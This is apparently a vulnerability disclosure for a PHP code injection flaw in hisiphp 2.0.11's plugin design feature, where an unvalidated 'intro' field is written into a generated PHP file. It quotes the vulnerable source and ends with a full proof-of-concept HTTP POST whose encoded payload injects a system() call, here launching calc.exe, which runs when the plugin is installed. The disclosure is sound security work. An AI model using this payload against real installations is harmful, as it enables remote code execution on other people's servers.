A code injection vulnerability in hisiphp 2.0.11
In https://github.com/hisiphp/hisiphp/blob/d05c908c29d574b84aa9e8932b13a5ef54e0a429/application/system/admin/Plugins.php#L129, $data
is controlled by users.
$model = new PluginsModel();
$data = $this->request->post();
$result = $this->validate($data, 'app\system\validate\SystemPlugins');
if ($result !== true) {
return $this->error($result);
}
if (!$model->design($data)) {
return $this->error($model->getError());
}
The validator https://github.com/hisiphp/hisiphp/blob/thinkphp5.1/v2/application/system/validate/SystemPlugins.php has been used here to impose restrictions on $data
, but only some fields have been limited.
class SystemPlugins extends Validate
{
//定义验证规则
protected $rule = [
'name|插件名称' => 'require|alpha|unique:system_plugins',
'title|插件标题' => 'require|chsAlphaNum|unique:system_plugins',
'identifier|插件标识' => 'require|regex:/^[A-Za-z0-9\-\.\_]+$/',
'author|开发者' => 'requireWith:author|chsAlphaNum',
'url|开发者网址' => 'requireWith:url|url',
'version|版本号' => 'require|regex:/^[0-9][.][0-9][.][0-9]+$/',
];
}
In https://github.com/hisiphp/hisiphp/blob/d05c908c29d574b84aa9e8932b13a5ef54e0a429/application/system/model/SystemPlugins.php#L455, $data['intro']
is injected into PHP code without restriction.
<?php
/**
* 插件基本信息
*/
return [
// 核心框架[必填]
'framework' => 'thinkphp5.1',
// 插件名[必填]
'name' => '{$data['name']}',
// 插件标题[必填]
'title' => '{$data['title']}',
// 模块唯一标识[必填],格式:插件名.[应用市场ID].plugins.[应用市场分支ID]
'identifier' => '{$data['identifier']}',
// 插件图标[必填]
'icon' => '/static/plugins/{$data['name']}/{$data['name']}.png',
// 插件描述[选填]
'intro' => '{$data['intro']}',
// 插件作者[必填]
'author' => '{$data['author']}',
// 作者主页[选填]
'author_url' => '{$data['url']}',
// 版本[必填],格式采用三段式:主版本号.次版本号.修订版本号
// 主版本号【位数变化:1-99】:当模块出现大更新或者很大的改动,比如整体架构发生变化。此版本号会变化。
// 次版本号【位数变化:0-999】:当模块功能有新增或删除,此版本号会变化,如果仅仅是补充原有功能时,此版本号不变化。
// 修订版本号【位数变化:0-999】:一般是 Bug 修复或是一些小的变动,功能上没有大的变化,修复一个严重的bug即发布一个修订版。
'version' => '{$data['version']}',
// 原始数据库表前缀,插件带sql文件时必须配置
'db_prefix' => 'db_',
//格式['sort' => '100','title' => '配置标题','name' => '配置名称','type' => '配置类型','options' => '配置选项','value' => '配置默认值', 'tips' => '配置提示'] 各参数设置可参考管理后台->系统->系统功能->配置管理->添加
'config' => {$config},
];
INFO;
file_put_contents($path.'info.php', $code);
}
}
POC:
POST /admin.php/system/plugins/design.html HTTP/1.1
Host: www.myhisiphp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: http://www.myhisiphp.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myhisiphp.com/admin.php/system/plugins/design.html
Cookie: PHPSESSID=fljtslc00l472cll5df60ilp39; hisiadmin_language=zh-cn; hisihisi_admin_theme=default; hisihisi_iframe=1; hisi_language=zh-cn
name=test&title=test&identifier=test&intro=%27%2Esystem%28%27calc%2Eexe%27%29%2E%27&author=test&url=http%3A%2F%2Fwww.test.com&version=1.0.0&dir=admin%0D%0Ahome%0D%0Amodel%0D%0Asql%0D%0Avalidate%0D%0Aview%0D%0A
The content of the generated plugins/test/info.php
is as follows:
return [
//......
'intro' => ''.system('calc.exe').'',
//......
];
Visiting /admin.php/system/plugins/install/id/5.html
can trigger the execution of malicious code, where 5 is the plugin's id.